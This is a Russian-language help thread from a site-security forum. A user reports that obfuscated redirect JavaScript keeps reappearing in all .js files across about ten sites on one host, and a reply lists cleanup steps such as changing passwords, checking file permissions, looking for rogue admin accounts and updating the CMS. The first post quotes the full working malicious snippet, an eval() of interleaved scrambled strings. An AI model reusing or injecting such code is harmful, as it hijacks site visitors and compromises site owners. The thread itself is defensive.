# Форум на русском языке  > Лечение и защита сайтов от вирусов  >  Как избавиться от заразы на сайтах?

## fedot567

Нашол на сайтах ( Что удивительно на всех сайтах которые находятся на одном хостинге) заразу перенаправляет на другой сайт,
Вот код заразы ((function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)o  mtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=  e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})"  ,d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.ch  arAt(i);eval(d);}()) :Wink: 
Во всех файлах с расширением js 							я его удалил! но через некоторое время он опять появился! как справится с этой заразой может кто знает? подскажите!

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Val_Ery

*fedot567*, 
если зараза появляется снова, тогда
- сменить все пароли (от панели управления хостинга, фтп, ssh, пароль к админке сайта и т.д.),
- проверить локальную машину на заразу,
- разобраться с правами на файлы и каталоги,
- проверить БД на предмет наличия левых пользователей/администраторов,
- проверить файлы самого сайта на предмет "а нет ли чего лишнего",
- обновится до актуальных версий CMS и расширений/плагинов,
- проверить все сайты, расположенные в Вашем домашнем каталоге,
-....

----------


## fedot567

Пароли сменил от хостинга! Так на хостинге около 10 сайтов большинство одностраничники удаляю код он через некоторое время опять появляется в какую сторону копать?

----------

